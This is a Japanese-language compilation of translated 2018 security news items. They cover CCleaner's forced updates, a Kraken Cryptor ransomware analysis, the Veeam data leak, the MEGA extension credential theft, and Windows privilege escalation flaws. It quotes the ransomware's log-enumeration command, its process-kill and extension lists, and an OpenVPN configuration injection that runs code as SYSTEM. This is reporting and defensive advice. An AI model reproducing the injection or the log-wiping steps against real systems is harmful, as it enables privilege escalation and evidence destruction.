     これが最初に報告されたのは、9月6日Piriformのフォーラムでのことである。ここで、ユーザ達は、自動アップデートを無効化していた場合でさえ、CCleanerのインストールされているバージョンが、5.46にアップデートされていたと述べている。これは後に、我々のフォーラムへの投稿で確証された。


    BleepingComputer.comへの投稿

     同じPiriformのトピックに於いて、担当者は、「v5.46のリリース以来、我々は、法的要件を満たすためにユーザをこのバージョンにアップデートし、彼らのプライバシー設定により多くの自立性と透明性を提供している」と、その回答で述べている。


    Piriformフォーラムへの担当者からの投稿

     実験的に、私はBleepingComputer.comでホストしているCCleaner 5.37のSlimバージョンをダウンロードしインストールした。
     設定手順の間に、私は新しいアップデートに関し自動アップデートしないように、このプログラムを設定した。自動アップデートの設定を無効化しているにも拘わらず、CCupdate.exeは、私がこのプログラムを起動する前にバージョン5.46へのアップデートを、このインストーラによって自動的に実行した。これを以下のビデオで示す。

     これは明らかに、CCleanerがユーザ設定を無視し、新しいバージョンのアップデートを強制しているということが懸念されている。
     自動アップデートプロセスに関する疑問を投げかけたとき、Avastスポークスマンは、以下の声明で対応した。

     「我々は、CCleanerバージョン5.36に重要なアップデート機能を導入した。この重要なアップデートは、セキュリティ上の脅威に対して我々のユーザを保護するために、データの損失や深刻なソフトウェア/ハードウェアのコンフリクトのようなシナリオを回避する目的で重要なソフトウェアアップデートを提供するために設計された。これはCCleaner Professionalが、外すことのできる自動アップデートとは異なっている(自動アップデート機能は、現在CCleaner Free版には搭載されていない)
     我々が定めた幾つかの理由により、バージョン5.46は、以下の重要なアップデートの最低基準を満たしたアップデートを含んでいる。
     ユーザが、Windows上で重要な問題を発生させることのないバージョンを利用していることを保証する。バージョン5.46は、Chromeでの個人設定の損失と、Windows Update後のグラフィックドライバ損壊の可能性を防ぐために、重要な安定性の問題を解決している。
     これは、ユーザのプライバシー設定に於いて望みうる最高のコントロールをユーザに提供するものである。バージョン5.46は、ユーザに更なるプライバシー設定を提供しており、我々のData Factsheetへのリンクを含んでいるため、CCleanerが報告できるデータとその理由に関して完全な透明性を提供する。我々は、v5.45で実行された変更に関してユーザのフィードバックを聞いた後、これが重要であると感じた。
     これは、アップデートされたユーザをGDPR(【訳註】 EUの一般データ保護規制)準拠バージョンに移行させる更なる利点を持っている(我々は、GDPRの導入時点でCCleanerの準拠したバージョンをリリースしているが、全ての人をこのバージョンにアップデートさせる義務を負っていなかった)。
     あなたの最後の質問に関する回答だが、このアップデートの間、プライバシー設定はDefaultには復元されない。ここ数カ月間に渡り、GDPRの要件に起因し、そして、ユーザフィードバックの結果として、プライバシー関連要件は変更された。結果として、利用可能なオプションは現在の法律とユーザの必要性を反映するようにアップデートされた。
     ユーザーの経験を念頭に置いて、重要なアップデートを構成するものと、それを発行する時期を判断している。 我々は、できるだけ多くのユーザが、最も明確なプライバシー設定を持つ安定且つ準拠したバージョンを利用することを望む。我々は、 ユーザーを混乱させたことを心からお詫びする。」

    CCleanerの自動アップデートを無効化する方法

     CCleanerはユーザの設定を無視し、アップデートのインストールを強制しているので、あなたが、アップデートを無効にしたいのであれば、CCleanerと共にインストールされているCCUpdate.exeと名付けられている実行ファイルを削除する必要がある。
     CCleanerがインストールされるとき、CCleanerは、CCleanerのアップデートをインストールするために使用されるこのファイルを C:\Program Files\CCleaner\CCupdate.exe にインストールする。このプログラムは次に、CCleaner Updateと呼ばれるScheduled Taskによって毎日自動的に稼働するように設定されている。


    CCleanerアップデート・スケジュール・タスク

     このプログラムを実行させないようにするには、スケジュール・タスクを削除しなければならない。更に安全にするために、C:\Program Files\CCleaner\CCupdate.exe 実行ファイルを削除することができる。
     このタスクと実行ファイルが削除されると、CCleanerは、あなたが実際に新しいバージョンをインストールした場合を除いて、最早アップデートされることはない。


    Kraken Cryptor身代金要求型マルウェアはSuperAntiSpywareセキュリティプログラムを装っている
    BleepingComputer : News>Security (2018/09/14)
     Kraken Cryptor身代金要求型マルウェアは、2018年08月にリリースされた新しい身代金要求型マルウェアである。Kraken Cryptor 1.5と呼ばれるバージョンは、最近リリースされたものであり、ユーザを欺き、このマルウェアをインストールさせるために正当なSuperAntiSpywareアンチ-マルウェア・プログラムのように装っている。

    SuperAntiSpywareのように装うKraken Cryptor身代金要求型マルウェア 1.5

     Kraken Cryptorがリリースされて以来追跡し続けているMalwareHunterTeamは、今朝、新しい変種を発見した。VirusTotalにエントリして調査しているとき、彼は、Kraken Cryptorインストーラは superantispyware.com から直接配布されているとVirusTotalが通知していることに気づいた。


    VirusTotalによって通知されたダウンロードURL

     正当なSuperAntiSpyware Freeインストーラのファイル名は、SUPERAntiSpyware.exeと名付けられている。Kraken Cryptorインストーラは、SUPERAntiSpywares.exeと名付けられていたことでVirusTotalに発見された。二つの名前の唯一の相違点は、悪意ある実行ファイルには"s"が追加されていることである。この悪意ある実行ファイルは最早、uperantispyware.comから利用することは出来ない。
     あなたは、Kraken Cryptorが以下に示したように同じアイコンを悪用してSuperAntiSpywareを装おうとしている方法を確認することができる。


    SuperAntiSpywareと同じアイコンを使用しているKraken Cryptor実行ファイル

     重要なことは、SUPERAntiSpyware.exeの実行ファイルは改竄されておらず、SuperAntiSpywareの正当なバージョンのインストールは継続されていることに注意することである。通常のリンクを介してSuperAntiSpywareをインストールしたユーザは影響を受けない。現時点で、我々は、ユーザがどのように悪意あるSUPERAntiSpywares.exe実行ファイルに誘導されるのか分かっていない。BleepingComputerは、eMail、電話、TwitterでSuperAntiSpywareにコメントを求める多くの試みを行ったが、この記事の公開の時点で回答を受け取っていない。

    開示: BleepingComputer.comは、SuperAntiSpyware.comや他のアンチ-マルウェア製品と提携している。

    Kraken Cryptor身代金要求型マルウェアがコンピュータを暗号化する方法

     Kraken Cryptor身代金要求型マルウェアは、エクスポートが簡単な組み込み型の設定ファイルによってどのようにコンピュータを暗号化するかの詳細な理解を提供している。この設定ファイルは、モジュールのリストや、モジュールが組み込まれたいた場合には、停止するプロセス、公開暗号鍵、eMail、身代金、暗号化用拡張子、スキップするファイルとフォルダ、暗号化されない国と言語等が含まれている。
     以下に設定ファイルの一部を示す。


    Kraken Cryptor 1.5の設定ファイルの一部

     実行されると、この身代金要求型マルウェアは、以下にリストされている一連のステップを実行するが、リストは正確に実行される順番にはなっていないかもしれない。
     この身代金要求型マルウェアは、C:\ProgramData\Safe.exeと呼ばれるファイルを作成し実行する。このプログラムは、全てのEvent Viewerのログのリストを列挙し、その出力をC:\ProgramData\EventLog.txtファイルにリダイレクトする。

    C:\Windows\system32\cmd.exe /c wevtutil.exe enum-logs > "C:\ProgramData\EventLog.txt"

     このプログラムは、次にこのEventlog.txt中にリストされた全てのログを削除する。
     Kraken Cryptorはまた、犠牲者の言語と所在地をチェックし、以下の国々に存在しているのであれば、そのコンピュータを暗号化しない。

    アルメニア、アゼルバイジャン、ベラルーシ、エストニア、ジョージア(以前のグルジア)、イラン、キルギス、リトアニア、ラトビア、モルドバ、ロシア、タジキスタン、ウクライナ、ウズベキスタン、ブラジル

     プロセスがデータベースを開いたままにすることを防ぎ、暗号化を出来ないようにするために、この身代金要求型マルウェアは、以下にリストされているプロセスを終了する。

    agntsvcagntsvc, agntsvcencsvc, agntsvcisqlplussvc, dbeng50, dbsnmp, firefoxconfig, msftesql, mydesktopqos,
    mydesktopservice, mysqld, mysqld-nt, mysqld-opt, ocomm, ocssd, oracle, sqbcoreservice, sqlagent, sqlbrowser,
    sqlservr, sqlwriter, sqlwb, synctime, tbirdconfig, xfssvccon

     コンピュータを暗号化しているとき、以下の拡張子に関してコンピュータをスキャンする。

    1cd. 3dm. 3ds. 3fr. 3g2. 3gp. 3pr. 7z. 7zip. aac. ab4. abd. accdb. accde. accdr. accdt. ach. acr. act. adb.
    adp. ads. agdl. ai. aiff. ait. al. aoi. apj. arw. ascx. asf. asm. asp. aspx. asx. atb. avi. awg. back. backup.
    backupdb. bak. bank. bay. bdb. bgt. bik. bin. bkp. blend. bmp. bpw. c. cdb. cdf. cdr. cdr3. cdr4. cdr5. cdr6.
    cdrw. cdx. ce1. ce2. cer. cfg. cfn. cgm. cib. class. cls. cmt. config. contact. cpi. cpp. cr2. craw. crt. crw.
    cs. csh. cs. csl. css. csv. dac. dat. db. db3. dbf. dbx. db_journal. dc2. dcr. dcs. ddd. ddoc. ddrw. dds. def.
    der. des. design. dgc. dit. djvu. dng. doc. docm. docx. dot. dotm. dotx. drf. drw. dtd. dwg. dxb. dxf. dxg. edb.
    eml. eps. erbsql. erf. exf. fdb. ffd. fff. fh. fhd. fla. flac. flb. flf. flv. flvv. fpx. fxg. gif. gray. grey.
    groups. gry. h. hbk. hdd. hpp. html. ibank. ibd. ibz. idx. iif. iiq. incpas. indd. info. info_. ini. jar. java.
    jnt. jpe. jpeg. jpg. js. json. kc2. kdbx. kdc. key. kpdx. kwm. laccdb. lck. ldf. lit. lock. log. lua. m. m2ts.
    m3u. m4p. m4v. mab. mapimail. max. mbx. md. mdb. mdc. mdf. mef. mfw. mid. mkv. mlb. mmw. mny. moneywell. mos. mov.
    mp3. mp4. mpeg. mpg. mrw. msf. msg. myd. nd. ndd. ndf. nef. nk2. nop. nrw. ns2. ns3. ns4. nsd. nsf. nsg. nsh.
    nvram. nwb. nx2. nxl. nyf. oab. obj. odb. odc. odf. odg. odm. odp. ods. odt. ogg. oil. omg. orf. ost. otg. oth.
    otp. ots. ott. p7b. p7c. p12. pab. pages. pas. pat. pbf. pcd. pct. pdb. pdd. pdf. pef. pem. pfx. php. pif. pl.
    plc. plus_muhd. pm!. pm. pmi. pmj. pml. pmm. pmo. pmr. pnc. pnd. png. pnx. pot. potm. potx. ppam. pps. ppsm. ppsm.
    ppsx. ppt. pptm. pptm. pptx. prf. ps. psafe3. psd. pspimage. pst. ptx. pwm. py. qba. qbb. qbm. qbr. qbw. qbx. qby.
    qcow. qcow2. qed. qtb. r3d. raf. rar. rat. raw. rdb. rm. rtf. rvt. rw2. rwl. rwz. s3db. safe. sas7bdat. sav. save.
    say. sd0. sda. sdb. sdf. sh. sldm. sldx. sql. sqlite. sqlite-shm. sqlite-wal. sqlite3. sqlitedb. sr2. srb. srf.
    srs. srt. srw. st4. st5. st6. st7. st8. stc. std. sti. stm. stw. stx. svg. swf. sxc. sxd. sxg. sxi. sxm. sxw. tbb.
    tbn. tex. tga. thm. tlg. tlx. txt. usr. vbox. vdi. vhd. vhdx. vmdk. vmsd. vmx. vmxf. vob. wab. wad. wallet. war.
    wav. wb2. wma. wmf. wmv. wpd. wps. x3f. x11. xis. xla. xlam. xlk. xlm. xlr. xls. xlsb. xlsm. xlsx. xlt. xltm.
    xltx. xlw. xml. ycbcra. yuv. and zip

     一致するファイルに遭遇すると、そのファイルを暗号化し、00000000-Lock.onionの形式でそのファイルの名前を変更する。数値はファイルが暗号化される度にインクリメントされる。オリジナルのファイル名は暗号化され、暗号化されたファイル中に格納される。


    Kraken Cryptorによって暗号化され、-Lock.onion拡張子が追加されたたファイルのフォルダ

     コンピュータを暗号化しているとき、Kraken Cryptorは全てのフォルダ中に # How to Decrypt Files.html と名付けた脅迫文を作成する。この脅迫文は、一意の犠牲者のキーと、0.125 Bitcoin(【訳註】 約90,636円、9月16日14:54分現在)での身代金の支払いを実行するための方法に関する指示を含んでいる。脅迫文中で提供されているコンタクト情報は、shortmangnet@420blaze と BM-2cUEkUQXNffBg89VwtZi4twYiMomAFzy6o@bitmessage.ch である。


    脅迫文の一部

     この身代金要求型マルウェアはまた、SysinternalsサイトからSDeleteをダウンロードし、release.batと呼ばれるバッチファイルを実行する。このバッチファイルは、SDeleteがドライブ上の全ての空き領域をクリアし、ファイルの復元を困難にするために0で上書きすることを発生させる。また、コンピュータをシャットダウンし、Windowsスタートアップ・リカバリを無効にし、Windowsバックアップを削除し、シャドー・ボリューム・コピーを削除する。


    Release.batバッチファイル

     これは、全て犠牲者がファイルを復元することを困難にするために実行される。

    Kraken Cryptor身代金要求型マルウェアを復号することは不可能

     残念ながら、現時点でKraken Cryptor身代金要求型マルウェアの変種で暗号化されたファイルを無料で復号する方法はない。
     暗号化されたファイルを復号する唯一の方法は、バックアップからである。もしくは、あなたが呆れ返るほど幸運だったのであれば、シャドー・ボリューム・コピーからである。Kraken Cryptorは、シャドー・ボリューム・コピーを削除しようとするが、極稀に、身代金要求型マルウェア感染が、何らかの理由からそうすることに失敗することがある。この理由から、あなたが実行可能なバックアップを持っていないのであれば、最後の手段としてシャドー・ボリューム・コピーから暗号化されたファイルを復元するように人々に提案している。
     この身代金要求型マルウェアを論議したい、あるいは、サポートを必要とする人々は、我々の専用のKraken Cryptor Ransomware Help & Support Topicを使用することができる。

    Kraken Cryptor身代金要求型マルウェアから自分自身を守るには

     Kraken Cryptor(もしくは、あらゆる身代金要求型マルウェア)から自分自身を守るには、適切なコンピュータ習慣とセキュリティ・ソフトウェアを使用することが重要である。何よりも先ず、身代金要求型マルウェア攻撃のような緊急の場合に復元可能な、あなたのデータの信頼あるテスト済みのバックアップを常に持つようにしなさい。
     身代金要求型マルウェアは、ハッキングされたリモート・デスクトップ・サービスを介してインストールされることが知られているので、そのバックアップが間違いなく正しくロックされていることが重要なことである。これは、リモート・デスクトップ・サービスを実行しているコンピュータが、間違いなく直接インターネットに接続されていないことを含んでいる。リモート・デスクトップをVPNの背後に置く代わりに、あなたのネットワーク上でVPNアカウントを持つ人々のみアクセス可能にしておくことである。
     アカウントがリモート・デスクトップ・サービスをブルートフォースされることを困難にするために、適切なアカウント・ロックアウト・ポリシー(【訳註】 アカウント・ロックアウトとは、パスワードを設定回数だけ入力ミスした場合に ユーザーアカウントを利用できない状態にすること(今日からはじめるWindows Server 2003サーバー管理入門より))を設定することは重要なことである。
     あなたはまた、身代金要求型マルウェアと戦うために、シグネチャやヒューリスティックだけではなく不正な挙動を検出するセキュリティソフトウェアを持たなければならない。例えば、EmsisoftのAnti-MalwareMalwarebytesのAnti-Malwareは共に、殆どではないが、コンピュータを暗号化する多くの身代金要求型マルウェア感染を検出することができる挙動検出を含んでいる。
     大事なことを言い忘れていたが、適切なオンライン・セキュリティ習慣の実践を確実にしなさい。多くの場合、最も重要なステップである。 
    • ・ ともかくバックアップ
    • ・ 送信者を知らない場合には、添付ファイルを開いてはならない
    • ・ 実際に添付ファイルをあなたに送信した人を確認するまでは添付ファイルを開いてはならない
    • ・ VirusTotalのようなツールで添付ファイルをスキャンしなさい
    • ・ 必ず、全てのWindowsアップデートが出現すると直ぐにインストールすることを確実にしなさい。また、全てのプログラムのアップデートを確実にしなさい。とりわけ、Java, Flash, Adobe Reader。古いプログラムは、マルウェア配布者によって一般的に悪用されるセキュリティ脆弱性を含んでいる。それ故、プログラムのアップデートを維持することは重要である。
    • ・ 間違いなくセキュリティソフトがインストールされていることを確実にしなさい
    • ・ 強力なパスワードを使用しなさい。決して複数のサイトで同じパスワードを使い回してはならない
    • ・ リモート・デスクトップ・サービスを使用しているのであれば、そのコンピュータを直接インターネットに接続してはならない。代わりに、VPNを介してだけアクセス可能にしなさい
     身代金要求型マルウェア防御の完全ガイドに関しては、我々のHow to Protect and Harden a Computer against Ransomwareの記事を訪問しなさい。

    UPDATE: 我々はSuperAntiSpywareから以下のステートメントを受け取った。
     SuperAntiSpywareは、BleepingComputerに、「企てられたSUPERAntiSpywareダウンロードサーバに対する攻撃の結果、悪意あるファイルが、SUPERAntiSpywareダウンロードサーバにアップロードされた。企ての数時間後に悪意あるファイルは発見され、サーバから削除された。それ以来、このサーバは完全にスキャンされ、この脆弱性は修正された」と告げてきた。


    Veeamが詐欺師共のために200GBの顧客データベースをリークした
    Bitdefender : HOTforSecurity (2018/09/13)
     200GBの顧客データを含むデータベース(凡そ4億4千500万レコードが存在していたと見積もられる)が、バックアップ及び復元企業Veeamによってオンラインに漏洩されていた。これは、Amazonにホストされていたサーバーが不適切に安全化されていたことによるものである。
     このデータベースは、名前、eMailアドレス、IPアドレス、参照元URLアドレス、顧客組織規模等を含んでいるかのようである。この発見を通知したセキュリティ研究者Bob Diachenkoは、この情報がフィッシぃング・キャンペーンを実施しているスパマーにとっては大変価値のあるものであると確信している。ただ、重要な金融情報は、database.goldmine中に同梱されていなかったようである。
     データの非機密性を考慮に入れても、このような巨大で構造化され標的化されたデータベースを公的に利用できることは、スパマーやフィッシング詐欺者にとっては宝箱といえる」と、Diachenkoは記述し、更に「とりわけMOngoDBsをターゲットにした新しい身代金要求型マルウェア攻撃の波(昨年よりずっと高額になっている)に、このデータベースが襲われなかったことは不幸中の幸いである」と続けている。
     AmazonサーバのIPアドレスは、Shodan検索エンジン(8月31日から、セキュリティの貧弱なインターネット接続デバイスを同定するために使用されたことで知られている)によってインデックス化されているかのようである。この研究者は9月5日に、この件を通知しているが、このサーバがコッソリとオフラインになったのはDiachenkoとTechCrunchのZack Whittakerが繰り返して通知した後の9月9日であった。
     この全データベースは、2013年から2017年までの情報を含んでいた可能性があり、潜在的にVeeamのマーケティング・インフラに使用されていた。
     「データベース中のコレクション名とデータの解析に基づき、私は当初、Marketoサーバに由来していると推測したので、彼らのeMailアドレスにセキュリティ通知を送信した」とし、続けて「しかしながら、さらなる解析で、このデータがVeeamマーケティング・サーバ・インフラの一部であると結論した」と、Diachenkoは記述している。
     VeeamのスポークスマンHeidi Kroftは、最近「我々は、詳細な調査の実施を継続している。そして、我々の発見したことに基づき適切な行動を取るだろう」と 述べている


    人気のあるVPNクライアントに権限昇格のバグが発見された
    BleepingComputer : News>Security (2018/09/07)
     Windowsマシン上のNordVPNとProtonVPNクライアントが、管理者権限で任意のコードを実行することを防止するためのパッチは、この脆弱性に対して不十分な制御しか実装していなかったことを、セキュリティ研究者が発見した。
     この二つのクライアントは、あるポイントから別のポイントへの安全なトンネルを構築するためにOpenVPNオープンソース・ソフトウェアを使用していた。このサービスは、管理者パーミッションで実行される必要があるので、実行される全てのコードは、この権限を享受している。
     Cisco TalosのPaul Rascagneresは、OpenVPNの設定ファイルが、任意のコードを含ませるように変更することができ、次に、サービスに渡し、Windows環境下でシステム権限で実行することができることを発見した。
     このバグは4月に、OpenVPNサービスが、"plugin"や"script-security"のようなパラメータを含む設定ファイを受け入れ実行できることを示したVerSpriteセキュリティコンサルティング企業のFabius Watsonによって公開されたバグに類似している。
     NordVPNとProtonVPNは共に、この二つのパラメータ並びに"up"や"down"(OpenVPNを介してコードやコマンドを実行する全てのメソッドに存在している)の存在に対するチェックを実装することによって、このバグを修正した。
     設定ファイル構文解析ツールでOpenVPNのソースコードを調べているとき、Rascagnaresは、これらの制御が不十分であり、同じ効果が、引用符間にパラメータを配置することによって達成できることに気が付いた。この研究者は、以下のテキストを設定ファイル中に追加することによって、このことを示した。

    "script-security" 2
    "up" C:\\WINDOWS\\system32\\notepad.exe

     NordVPNとProtonVPNは、Windows上でNotepad(メモ帳)を起動した。


    画像をクリックすると拡大します。

     この二つのセキュリティ・バグは、ProtonVPNに関してはCVE-2018-3952で、NordVPNに関してはCVE-2018-4010で現在監視されている。セキュリティ評価は、8.8である(最悪は、10)。
     Rascagnaresは、7月5日に二つのVPNプロバイダに対して、この欠陥を公開した。NordVPNは8月8日にパッチをリリースし、ProtonVPNは9月3日に修正を提供した。
     今回、二つのベンダは異なる修正方法を選択した。
     「ProtonVPNに関しては、インストレーション・ディレクトリにOpenVPN設定ファイルを配置し、標準ユーザがこのファイルを修正できないようにした。従って、設定ファイル中に悪意ある文字列を追加することは出来ない。NordVPNは、OpenVPN設定ファイルを生成するためにXMLモデルを使用することを決定した。標準ユーザは、このテンプレートを編集することは出来ない」と、Rascagnaresは本日のブログで明らかにしている。
     権限昇格バグの影響を受けるクライアントのバージョンは、ProtonVPN 1.5.1 と NordVPN 6.14.28.0である。NordVPNのユーザは、このアプリケーションの最新のリリースに自動的にアップデートされるが、ProtonVPNのユーザは、手動でこのプロセスを開始する必要がある。

    MEGA Chrome拡張がログイン認証と仮想通貨を盗む目的でハックされていた
    BleepingComputer : News>Security (2018/09/05)
     セキュリティ研究者達は、MEGA Chrome拡張がログイン認証と仮想通貨のキーを盗むために改竄されていたことを発見した。この拡張は、悪意あるものに置き換えられていたことが発見された後、GoogleはChrome Web Storeから、この拡張を削除した。
     このハッキングは、SerHack(セキュリティ研究者であり、Moneroプロジェクトの貢献者)によって発見され、直ちにMEGA Chrome拡張のバージョン3.39.4が、ハックされているとする警告がTweetされた。他のセキュリティ研究者達は、即座にこの拡張の解析に取り掛かり、彼らが発見したことをレポートしている。
     この拡張がインストールされると、Amazon, Microsoft, Github, Googleへの固有のログインフォーム提出物を監視する。


    様々なサイトでのログインの監視(画像をクリックすると拡大します)

     URLがRegisterもしくはLoginの文字列を含むか、もしくは、"username", "email", "user", "login", "usr", "pass", "passwd"か"password"と名付けられた変数が存在するあらゆる形式の提出物の監視を実行する。


    特定の名前の付いた変数を盗む(画像をクリックすると拡大します)

     この拡張が、これらの形式の提出物やデータ変数を検出すると、https://www.megaopac.host/ と呼ばれるウクライナにあるホストに、この認証と変数の値を送信する。


    攻撃者に情報を送信する(画像をクリックすると拡大します)

     この拡張を更に悪いものにしているのは、"https://www.myetherwallet.com/*", "https://mymonero.com/*", "https://idex.market/*"のようなURLのパターンを監視していることである。そして、検出されると、これらのサイトからログインしているユーザの仮想通貨秘密鍵を盗もうとする。


    仮想通貨秘密鍵の捕獲(画像をクリックすると拡大します)

     Chrome拡張アーカイブサイト(crx.dam.io)によると、アーカイブされた最新のバージョンは、3.39.3である。これは、2018年9月2日に存在しており、悪意あるコードは含まれていない。それ故、この拡張は、9月2日以降のある時期に改竄されたことになる。
     研究者は、MEGAアドオンのFirefoxバージョンも検証し、改竄されていないと結論している。

    MEGAをインストールしている場合に実行すべきこと

     BleepingComputerはSerHackに、どのくらい多くのユーザが、この拡張をインストールしているのかと尋ねた。彼は、影響を受けるユーザは160万を超えるだろうと告げてきた。このハッキングは、明らかに多大な影響力を持っている。
     この拡張をインストールしている人々は、即座にMEGA拡張を削除する必要がある。次に、あらゆるアカウントでのパスワードを変更しなさい、とりわけ、金融、ショッピング、銀行、政府施設、その他あなたが使用しているもの。

    MEGAはハックされた拡張に関する声明を発表した

     MEGAは、その声明に於いて、彼らのChrome拡張Web Storeアカウントがハックされた、そして、発生していることを調査中であると述べている。
     「協定世界時2018年9月4日14時30分(日本時間、同日23時30分)、正体不明な攻撃者が、トロイの木馬化したMEGAのChrome拡張(バージョン3.39.4)をGoogle ChromeのWebサイトにアップロードした」と、この件に関しMega.nzのブログで述べ、更に、「インストレーションや自動アップデート時には、昇格されたパーミッション(あなたが訪問している全てのWebサイトでのあなたの全データを読み込み変更できるパーミッション)を要求してくるが、本物のMEGA拡張は、このようなことは要求しない。そして(パーミッションが承認されると)amazon.com, live.com, github.com, google.com (webstoreログイン用), myetherwallet.com, mymonero.com, idex.market, HTTP POSTが他のサイトに要求したものを含む認証情報をウクライナにあるサーバに漏洩する」と続けている。
     彼らは更に、「Googleは、著作者が拡張に署名する機能を削除し、代わりに、この拡張がアップロードされた後、それらに署名するGoogleを信頼しなければならなくなったので、外部からの改竄の発生をより簡単ならしめている」と述べている。
     「我々は、この重大な事件に関し謝罪する。MEGAは、マルチパーティー・コード検証、堅牢なビルド・ワークフロー、可能であれば暗号化シグネチャという厳格なリリース手順を使用している」と、ブログでは述べられている。「残念ながら、GoogleはChrome拡張への著作者のシグネチャを無効にすることを決定した。そして現在、Googleは、Chrome Webストアにアップロードされた後、もっぱら自動的に署名することに依存している。これは外部からの改竄に対する重要な防御壁を削除することである。MEGAsyncと我々のFirefox拡張は、我々によって署名されホストされている。それ故、この攻撃ベクトルによる犠牲者の発生の可能性はない。我々のモバイルアプリケーションは、Apple / Google / Microsoftによってホストされているが、我々によって暗号化された署名がなされているため、同様に影響を受けることはない」と続けている。


    Microsoftが、Windows 10の累積アップデートKB4346783とKB4343893をリリースした
    BleepingComputer : News>Security (2018/08/30)
     凡そ2週間前、Microsoftは8月の定例パッチをリリースした。本日、Microsoftは、以前のパッチで導入された問題を修正するWindows 10の累積アップデートのセットをリリースした。
     Microsoftは今朝、セキュリティ以外の改善と修正を行うWindows 10用の新しい一連の累積アップデートをお披露目している。Windows 10 April 2018 Update(バージョン 1803)とWindows 10 Fall Creators Update(バージョン 1709)を稼働しているシステムは、一般的なバグを修正するこの新しいパッチを受け取るだろう。


    Windows 10アップデート チェック

     更新履歴によると、このアップデートはWindows 10の様々な問題を修正するものである。システムにこの最新のパッチをインストールするには、「設定」を開き、更新とセキュリティ -> Windows Updateと進む。「更新プログラムのチェック」をクリックする。いつもどおり、ここから手動でこのアップデートをダウンロードしインストールすることができる。

    Windows 10 April 2018 Update用Build 17134.254

     現在、Windows 10 April 2018 Updateを使用しているのであれば、KB4346783が、あなたのデバイス用に表示されているだろう。このパッチは、Windows 10 April 2018 UpdateのPCをBuild 17134.254に高める。このパッチはWindows UpdateもしくはMicrosoft Updateカタログからダウンロードすることができる。
     このパッチは以下の修正と改善を行う。

     【訳注】Microsoftサポートサイトのコピー&ペーストのため省略いたします。Microsoftサポートサイト(日本語サイト、2018/08/31時点では英文のまま)はこちらです。このパッチの既知の一つの問題の概要と解決策もこのサイト中に存在しています。

    Windows 10 Fall Creators Update用Build 16299.637

     Windows 10 Fall Creators Updateを依然として使用しているのなら、PCは、KB4343893を得ているだろう。このアップデートは、顧客をBuild 16299.637に高める。このパッチは以下の修正を含んでいる。

     【訳注】Microsoftサポートサイトのコピー&ペーストのため省略いたします。Microsoftサポートサイト(日本語サイト、2018/08/31時点では英文のまま)はこちらです。このパッチの既知の二つの問題の概要と解決策もこのサイト中に存在しています。

     Windows 10 PCのアップデートを維持することは重要なので、このパッチは可能な限り早急にインストールすることが推奨されているが、あなたが、このパッチの適用を遅延したいのであれば、「設定」に進み、「更新とセキュリティ」から、アクティブ時間と再起動オプションを調整しなさい。


    Windows Task Scheduler ALPC 0-Dayの一時的なパッチが利用可能になった
    BleepingComputer : News>Security (2018/08/30)

     今週初め、セキュリティ研究者がTask Scheduler ALPCインターフェースに影響を与えるWindowsの0-Day用の脆弱性攻撃コードをリリースした。本日、サイバーセキュリティ企業Acros Securityが、この特定の0-Dayの悪用を防止する一時的な修正(Micropatchと呼ばれる)を公開した。
     ユーザは、0patch Agentクライアントをダウンロードしインストールすることで一時的パッチを適用することができる。

    Micropatchは最新のWindows 10だけでしか利用できない

     このパッチは、64-bit Windows 10 v1803バージョンのユーザのみしか利用できないと、Mitja Kolsek(Acros SecurityのCEO)はeMail経由で本日BleepingComputerに告げてきた。
     「我々は明日、Windows Server 2016用のMicropatchをリリースする予定である」と、Kolsekは発言している。
     この企業は、明日のブログへの投稿で、企業が0patch以外の方法で彼らのシステムに、このMicropatchを適用したい場合に備えて、このMicropatchの内部動作のより詳細な説明をソースコード共々公開することを計画している。


    0patchのTweet
    @0patch
    Replying to @0patch @SandboxEscaper
    Blog post is in the making but for the impatient, here's the source code of our micropatch. Three patchlets, one calling RpcImpersonateClient, one removing a premature call to RpcRevertToSelf, and one adding a RpcRevertToSelf call where it should be. Just 4 instructions.
    9:49 PM - Aug 30, 2018

     この企業はまた、他の影響を受けるプラットフォームに、このパッチを移植するための提案や要求を探している。「我々は、support@0patch.comで他のバージョンへの移植に関する要求を歓迎している」とこの企業は発言している。

    この0-Dyaは64-bitだけでなく32-bitプラットフォームにも影響を与える

     この0-Dayは、セキュリティ研究者がGitHub上に概念の実証コードを公開し、Twitter上でこの問題を喧伝した2日前(8月29日)に表面化した。この0-Dayは、攻撃者がユーザのデバイス上でゲストもしくはユーザ・レベルからシステム・アクセスで実行するように悪意あるコードのパーミッションを昇格することを可能にするものである。
     GitHub上で公開されたオリジナルの脆弱性悪用コードは、Windows 10 v1803とWindows Server 2016の64-bitバージョンでのみ動作することが知られていた。
     翌日の8月29日、セキュリティ研究者Will DormannKevin Beaumontは、僅かな変更で32-bitバージョンでも同様に動作するように修正することができることをレポートした。


    Will DormannのTweet
    @wdormann
    Replying to @wdormann
    I can't imagine too many people are interested, but I can confirm that with minor tweaks the public exploit code for the Windows Task Manager ALPC vul works on 32-bit Windows 10 as well.
    6:33 AM - Aug 29, 2018

     Microsoftは、いつも通りなんの役にも立たない定型文の回答しか提供しなかったが、Microsoftは、この0-Dayの修正を次回の月例セキュリティアップデート(9月11日、日本時間 9月12日)で修正するであろうと思われていた。
     0-Dayが公開されて以来2日経過したが、悪意ある脅威の悪漢共によってオンライン上で、この0-Dayが使用されたというレポートは存在していない。
     Windowsのフローに対してAcros SecurityがMicropatchを提供したのは今回が初めてのことではない


    Windows Task Scheduler中の未パッチのフローが公開された
    BleepingComputer : News>Security (2018/08/27)
     セキュリティ研究者が、Windows OS中の脆弱性に関する詳細をTwitter上で公開した。
     この脆弱性は、「ローカル権限の昇格」問題であり、攻撃者が限定的ユーザの役割から全システムアカウントに悪意あるコードのアクセスを昇格することを可能にするものである。
     Will Dormann(CERT/CCのエンジニア)は、この脆弱性を確認し、昨晩公式のCERT/CCアラートを発行した。
     Dormanは、この脆弱性がWindows Task Scheduler、より正確にはAdvanced Local Procedure Call (ALPC)インターフェース中に存在していると発言している。
     ALPCインターフェースは、プロセス間通信機能として動作するWindows内部メカニズムである。ALPCは、OS内で実行されているクライアント・プロセスが、同じOS内で動作しているサーバ・プロセスに何らかの情報を提供したり、何らかのアクションを実行するように依頼することを可能にする。
     この研究者(オンラインではSandboxEscaperと名乗っている)は、ALPCインターフェースを悪用してWindowsシステムでシステムアクセスを取得するための「概念の実証」(PoC)コードをGitHub上にリリースしている。
     良性のマルウェア(【訳註】 悪意のある(有害な)ペイロードを保持していないマルウェア(マルウェア情報局より))が多くの既存の方法よりもっと信頼性のあるエクスプロイトを使用して標的になっているシステムの管理者アクセスを取得できるので、マルウェアの作成者はとりわけ、このPoCに関心を持つだろう。
